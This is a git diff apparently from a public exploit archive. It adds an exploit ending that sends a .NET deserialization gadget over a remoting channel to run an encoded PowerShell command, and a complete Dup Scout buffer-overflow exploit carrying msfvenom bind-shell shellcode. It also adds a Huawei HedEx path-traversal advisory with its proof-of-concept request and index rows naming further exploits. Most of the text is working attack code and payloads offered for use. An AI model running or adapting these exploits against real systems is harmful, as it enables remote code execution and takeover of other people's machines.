+payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAPIKL2MgcG93ZXJzaGVsbC5leGUgLWVuY29kZWRDb21tYW5kIFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
+payload = base64.b64decode(payload)
+payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)
+​
+uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')
+​
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((HOST,PORT)) 
+​
+msg = bytes()
+msg += b'.NET'                 # Header
+msg += b'\x01'                 # Version Major
+msg += b'\x00'                 # Version Minor
+msg += b'\x00\x00'             # Operation Type
+msg += b'\x00\x00'             # Content Distribution
+msg += pack('I', len(payload)) # Data Length
+msg += b'\x04\x00'             # URI Header
+msg += b'\x01'                 # Data Type
+msg += b'\x01'                 # Encoding - UTF8
+msg += pack('I', len(uri))     # URI Length
+msg += uri                     # URI
+msg += b'\x00\x00'             # Terminating Header
+msg += payload                 # Data
+​
+s.send(msg)
+s.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/49217.py b/exploits/windows/remote/49217.py
new file mode 100755
index 000000000..02a828769
--- /dev/null
+++ b/exploits/windows/remote/49217.py
@@ -0,0 +1,67 @@
+# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
+# Date: 2020-12-08
+# Exploit Author: Andrés Roldán
+# Vendor Homepage: http://www.dupscout.com
+# Software Link: http://www.dupscout.com/downloads.html
+# Version: 10.0.18
+# Tested on: Windows 10 Pro x64
+
+#!/usr/bin/env python3
+
+import socket
+import struct
+
+HOST = '127.0.0.1'
+PORT = 80
+
+# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL
+SHELL =  b""
+SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
+SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4"
+SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4"
+SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8"
+SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc"
+SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2"
+SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41"
+SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9"
+SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91"
+SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5"
+SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b"
+SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4"
+SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca"
+SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7"
+SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28"
+SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb"
+SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0"
+SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90"
+SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7"
+SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7"
+SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe"
+SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7"
+SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57"
+SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4"
+SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6"
+SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6"
+SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25"
+SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec"
+SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa"
+SHELL += b"\xfa\xa9\x3b\x45"
+
+PAYLOAD = (
+    b'\x90' * (2482 - len(SHELL)) +
+    SHELL +
+    b'\xeb\x10\x90\x90' +
+    struct.pack('<L', 0x1002071c) +
+    b'\x90' * 32  +
+    b'\xE9\x4D\xF6\xFF\xFF' +
+    b'C' * (10000 - 2482 - 4 - 32 - len(SHELL))
+)
+
+HTTP_PAYLOAD = (
+    b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' +
+    b'Host: ' + HOST.encode() +
+    b'\r\n\r\n'
+)
+
+with socket.create_connection((HOST, PORT)) as fd:
+    fd.sendall(HTTP_PAYLOAD)
\ No newline at end of file
diff --git a/exploits/windows/remote/49218.txt b/exploits/windows/remote/49218.txt
new file mode 100644
index 000000000..ad386c027
--- /dev/null
+++ b/exploits/windows/remote/49218.txt
@@ -0,0 +1,303 @@
+# Exploit Title: Huawei HedEx Lite 200R006C00SPC005 - Path Traversal
+# Date: 2020-11-24
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://www.huawei.com/
+# Software Link: https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
+# Version: 200R006C00SPC005
+
+Document Title:
+===============
+Huawei HedEx Lite (DM) - Path Traversal Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2268
+
+
+Release Date:
+=============
+2020-11-24
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2268
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+Directory- or Path-Traversal
+
+
+Current Estimated Price:
+========================
+3.000€ - 4.000€
+
+
+Product & Service Introduction:
+===============================
+https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
+
+
+Abstract Advisory Information:
+==============================
+A vulnerability laboratory core team researcher discovered a path
+traversal vulnerability in the Huawei HedEx Lite v200R006C00SPC005.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-24: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+An exploitable path traversal vulnerability has been discovered in the
+official Huawei HedEx Lite v200R006C00SPC005.
+Attackers can able to request local files or resources by remote
+requesting to unauthorized change a local path.
+
+
+Proof of Concept (PoC):
+=======================
+The path traversal vulnerability can be exploited by remote attackers
+with restricted system user privileges wihtout user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Vulnerable File(s):
+./newOtherManageContent.cgi [URL Path Filename]
+./newStartupHedExBeeAction.cgi [URL Path Filename]
+./newprehomeadvsearch.cgi [URL Path Filename]
+
+
+--- PoC Session Logs [POST Method Request] ---
+URL:
+http://localhost:7890/newOtherManageContent.cgi/................................windowswin.ini
+Path:
+/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
+HTTP/1.1
+Host: localhost:7890
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101
+Firefox/27.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost:7890/newindex.cgi
+Connection: close
+Content-Length: 0
+
+
+ --- PoC Session Logs [Response] ---
+HTTP/1.1 200 OK
+Content-Disposition: attachment; filename="win.ini"
+Content-Length: 1801
+Content-Type: application/octet-stream;charset=utf-8
+X-Frame-Options: SAMEORIGIN
+-
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+CMCDLLNAME32=mapi32.dll
+CMC=1
+MAPIX=1
+MAPIXVER=1.0.0.1
+OLEMessaging=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+[Drivers.32]
+OLEMessaging.64=$80,$5D,$D9,$A6,$A4,$18,$A8,$AD
+[ChannelDownmixer]
+p1.bIsMultichannel=0
+p1.wFormatTag=1
+p1.nChannels=2
+p1.dwChannelMask=63
+p1.wBitsPerSample=16
+p1.RequiredInputBitDepth=0
+p1.bRequireInputNumberOfChannels=0
+p1.RequiredInputNumberOfChannels=6
+p1.bRequireInputSamplerate=0
+p1.RequiredInputSamplerate=48000
+p1.bRaiseMeritAndSingleInstance=1
+p2.InputEnableBitmask=-1
+p2.OutputEnableBitmask=-1
+p2.bEnableInputGains=0
+p2.bEnableOutputGains=0
+p2.bEnableMasterVolume=0
+p2.MasterVolumeGain=100
+p2.I.FL=100
+p2.I.FR=100
+p2.I.FC=100
+p2.I.LF=100
+p2.I.BL=100
+p2.I.BR=100
+p2.I.FLC=100
+p2.I.FRC=100
+p2.I.BC=100
+p2.I.SL=100
+p2.I.SR=100
+p2.I.TC=100
+p2.I.TFL=100
+p2.I.TFC=100
+p2.I.TFR=100
+p2.I.TBL=100
+p2.I.TBC=100
+p2.I.TBR=100
+p2.I.bJoinFLFR=1
+p2.I.bJoinBLBR=1
+p2.I.bJoinFLCFRC=1
+p2.I.bJoinSLSR=1
+p2.I.bJoinTFLTFR=1
+p2.I.bJoinTBLTBR=1
+p2.O.FL=100
+p2.O.FR=100
+p2.O.FC=100
+p2.O.LF=100
+p2.O.BL=100
+p2.O.BR=100
+p2.O.FLC=100
+p2.O.FRC=100
+p2.O.BC=100
+p2.O.SL=100
+p2.O.SR=100
+p2.O.TC=100
+p2.O.TFL=100
+p2.O.TFC=100
+p2.O.TFR=100
+p2.O.TBL=100
+p2.O.TBC=100
+p2.O.TBR=100
+p2.O.bJoinFLFR=1
+p2.O.bJoinBLBR=1
+p2.O.bJoinFLCFRC=1
+p2.O.bJoinSLSR=1
+p2.O.bJoinTFLTFR=1
+p2.O.bJoinTBLTBR=1
+p3.bCustomMixMatrix=0
+CustomMixMatrixFilename=
+LastRegisteredVersion=20000
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be resolved by setting restricted accessable
+paths.  A whitelist or static paths configuration can be combined.
+An update is available on the huawei website provided by the
+manufacturer of the application via customer portal.
+
+
+Security Risk:
+==============
+The security risk of the path traversal web vulnerability in the
+download manager software is estimated as high.
+
+
+Credits & Authors:
+==================
+S.AbenMassaoud [Research Team] -
+https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9334b50e4..e55034d8c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11228,6 +11228,7 @@ id,file,description,date,author,type,platform,port
 49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
 49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
+49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18334,6 +18335,9 @@ id,file,description,date,author,type,platform,port
 49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
 49169,exploits/multiple/remote/49169.sh,"Ksix Zigbee Devices - Playback Protection Bypass (PoC)",2020-12-02,"Alejandro Vazquez Vazquez",remote,multiple,
 49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,
+49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
+49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
+49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43436,3 +43440,8 @@ id,file,description,date,author,type,platform,port
 49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php,
 49212,exploits/php/webapps/49212.txt,"Online Bus Ticket Reservation 1.0 - SQL Injection",2020-12-08,"Sakshi Sharma",webapps,php,
 49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,
+49219,exploits/multiple/webapps/49219.txt,"VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation",2020-12-09,Vulnerability-Lab,webapps,multiple,
+49220,exploits/multiple/webapps/49220.txt,"VestaCP 0.9.8-26 - 'backup' Information Disclosure",2020-12-09,Vulnerability-Lab,webapps,multiple,
+49222,exploits/php/webapps/49222.txt,"Task Management System 1.0 - 'First Name and Last Name' Stored XSS",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49223,exploits/php/webapps/49223.txt,"Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49224,exploits/php/webapps/49224.txt,"Task Management System 1.0 - 'id' SQL Injection",2020-12-09,"Saeed Bala Ahmed",webapps,php,